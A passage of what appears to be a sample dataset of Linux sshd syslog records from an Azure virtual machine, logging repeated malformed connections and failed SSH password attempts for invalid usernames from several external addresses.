+232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:29,UbuntuDevEnv,2019-06-28 11:21:29,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2870,50139,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2870,,
+233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:30,UbuntuDevEnv,2019-06-28 11:21:29,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2871,50141,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2871,,
+234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:30,UbuntuDevEnv,2019-06-28 11:21:29,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2872,50142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2872,,
+235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:30,UbuntuDevEnv,2019-06-28 11:21:30,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2873,50143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2873,,
+236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:30,UbuntuDevEnv,2019-06-28 11:21:30,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2874,50145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2874,,
+237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:31,UbuntuDevEnv,2019-06-28 11:21:30,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2875,50147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2875,,
+238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:31,UbuntuDevEnv,2019-06-28 11:21:30,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2876,50148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2876,,
+239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:31,UbuntuDevEnv,2019-06-28 11:21:31,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2877,50149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2877,,
+240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:31,UbuntuDevEnv,2019-06-28 11:21:31,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2878,50152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2878,,
+241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:32,UbuntuDevEnv,2019-06-28 11:21:31,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2879,50153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2879,,
+242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:32,UbuntuDevEnv,2019-06-28 11:21:31,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2624,50154,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2624,,
+243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:32,UbuntuDevEnv,2019-06-28 11:21:32,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2625,50155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2625,,
+244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:32,UbuntuDevEnv,2019-06-28 11:21:32,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2626,50158,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2626,,
+245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:33,UbuntuDevEnv,2019-06-28 11:21:32,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2627,50159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2627,,
+246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:33,UbuntuDevEnv,2019-06-28 11:21:32,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2628,50160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2628,,
+247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:33,UbuntuDevEnv,2019-06-28 11:21:33,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2629,50161,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2629,,
+248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:33,UbuntuDevEnv,2019-06-28 11:21:33,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2630,50164,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2630,,
+249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:34,UbuntuDevEnv,2019-06-28 11:21:33,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2631,50165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2631,,
+250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:34,UbuntuDevEnv,2019-06-28 11:21:33,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2632,50166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2632,,
+251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:34,UbuntuDevEnv,2019-06-28 11:21:34,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2633,50167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2633,,
+252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:35,UbuntuDevEnv,2019-06-28 11:21:34,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2634,50174,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2634,,
+253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:35,UbuntuDevEnv,2019-06-28 11:21:34,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2635,50175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2635,,
+254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:35,UbuntuDevEnv,2019-06-28 11:21:35,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2636,50176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2636,,
+255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:35,UbuntuDevEnv,2019-06-28 11:21:35,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2637,50178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2637,,
+256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 13:16:37,UbuntuDevEnv,2019-06-28 13:16:37,auth,UbuntuDevEnv,info,Received disconnect from 189.199.252.187 port 47011:11: Bye Bye [preauth],75978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,189.199.252.1,47011,,
+257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 13:16:37,UbuntuDevEnv,2019-06-28 13:16:37,auth,UbuntuDevEnv,info,Disconnected from 189.199.252.187 port 47011 [preauth],75978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,189.199.252.1,47011,,
+258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 14:28:41,UbuntuDevEnv,2019-06-28 14:28:41,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.182 port 33592,91918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,33592,,
+259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 14:28:41,UbuntuDevEnv,2019-06-28 14:28:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.182,91918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.1,,0,
+260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 14:28:41,UbuntuDevEnv,2019-06-28 14:28:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 14:28:43,UbuntuDevEnv,2019-06-28 14:28:42,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.182 port 33592 ssh2,91918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,33592,,
+262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 14:28:45,UbuntuDevEnv,2019-06-28 14:28:45,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.182 port 33592: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",91918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,33592,,
+263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:30,UbuntuDevEnv,2019-06-26 17:32:29,auth,UbuntuDevEnv,info,Invalid user netlogon from 111.230.29.17 port 55518,51197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netlogon,111.230.29.1,55518,,
+264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:30,UbuntuDevEnv,2019-06-26 17:32:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,51197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:30,UbuntuDevEnv,2019-06-26 17:32:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:31,UbuntuDevEnv,2019-06-26 17:32:31,auth,UbuntuDevEnv,info,Failed password for invalid user netlogon from 111.230.29.17 port 55518 ssh2,51197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netlogon,111.230.29.1,55518,,
+267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:32,UbuntuDevEnv,2019-06-26 17:32:31,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 55518:11: Bye Bye [preauth],51197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,55518,,
+268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:32,UbuntuDevEnv,2019-06-26 17:32:31,auth,UbuntuDevEnv,info,Disconnected from invalid user netlogon 111.230.29.17 port 55518 [preauth],51197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netlogon,111.230.29.1,55518,,
+269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:49,UbuntuDevEnv,2019-06-26 17:32:49,auth,UbuntuDevEnv,info,Invalid user samuel from 74.94.246.82 port 40570,51276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samuel,74.94.246.8,40570,,
+270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:49,UbuntuDevEnv,2019-06-26 17:32:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:49,UbuntuDevEnv,2019-06-26 17:32:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,51276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:51,UbuntuDevEnv,2019-06-26 17:32:51,auth,UbuntuDevEnv,info,Failed password for invalid user samuel from 74.94.246.82 port 40570 ssh2,51276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samuel,74.94.246.8,40570,,
+273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:51,UbuntuDevEnv,2019-06-26 17:32:51,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 40570:11: Bye Bye [preauth],51276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,40570,,
+274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:51,UbuntuDevEnv,2019-06-26 17:32:51,auth,UbuntuDevEnv,info,Disconnected from invalid user samuel 74.94.246.82 port 40570 [preauth],51276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samuel,74.94.246.8,40570,,
+275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:59,UbuntuDevEnv,2019-06-26 17:32:59,auth,UbuntuDevEnv,info,Invalid user etienne from 77.237.69.165 port 48319,51312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,77.237.69.1,48319,,
+276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:59,UbuntuDevEnv,2019-06-26 17:32:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:32:59,UbuntuDevEnv,2019-06-26 17:32:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,51312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:33:01,UbuntuDevEnv,2019-06-26 17:33:00,auth,UbuntuDevEnv,info,Failed password for invalid user etienne from 77.237.69.165 port 48319 ssh2,51312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,77.237.69.1,48319,,
+279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:33:01,UbuntuDevEnv,2019-06-26 17:33:00,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 48319:11: Bye Bye [preauth],51312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,48319,,
+280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:33:01,UbuntuDevEnv,2019-06-26 17:33:00,auth,UbuntuDevEnv,info,Disconnected from invalid user etienne 77.237.69.165 port 48319 [preauth],51312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,77.237.69.1,48319,,
+281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:02,UbuntuDevEnv,2019-06-26 17:34:01,auth,UbuntuDevEnv,info,Invalid user jinzhenj from 111.230.29.17 port 40664,51529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jinzhenj,111.230.29.1,40664,,
+282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:02,UbuntuDevEnv,2019-06-26 17:34:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,51529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:02,UbuntuDevEnv,2019-06-26 17:34:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:04,UbuntuDevEnv,2019-06-26 17:34:03,auth,UbuntuDevEnv,info,Failed password for invalid user jinzhenj from 111.230.29.17 port 40664 ssh2,51529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jinzhenj,111.230.29.1,40664,,
+285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:04,UbuntuDevEnv,2019-06-26 17:34:03,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 40664:11: Bye Bye [preauth],51529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,40664,,
+286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:04,UbuntuDevEnv,2019-06-26 17:34:03,auth,UbuntuDevEnv,info,Disconnected from invalid user jinzhenj 111.230.29.17 port 40664 [preauth],51529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jinzhenj,111.230.29.1,40664,,
+287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:21,UbuntuDevEnv,2019-06-26 17:34:21,auth,UbuntuDevEnv,info,Invalid user teamspeak3 from 74.94.246.82 port 57770,51599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,74.94.246.8,57770,,
+288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:21,UbuntuDevEnv,2019-06-26 17:34:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,51599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:21,UbuntuDevEnv,2019-06-26 17:34:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:24,UbuntuDevEnv,2019-06-26 17:34:23,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak3 from 74.94.246.82 port 57770 ssh2,51599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,74.94.246.8,57770,,
+291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:24,UbuntuDevEnv,2019-06-26 17:34:23,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak3 74.94.246.82 port 57770 [preauth],51599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,74.94.246.8,57770,,
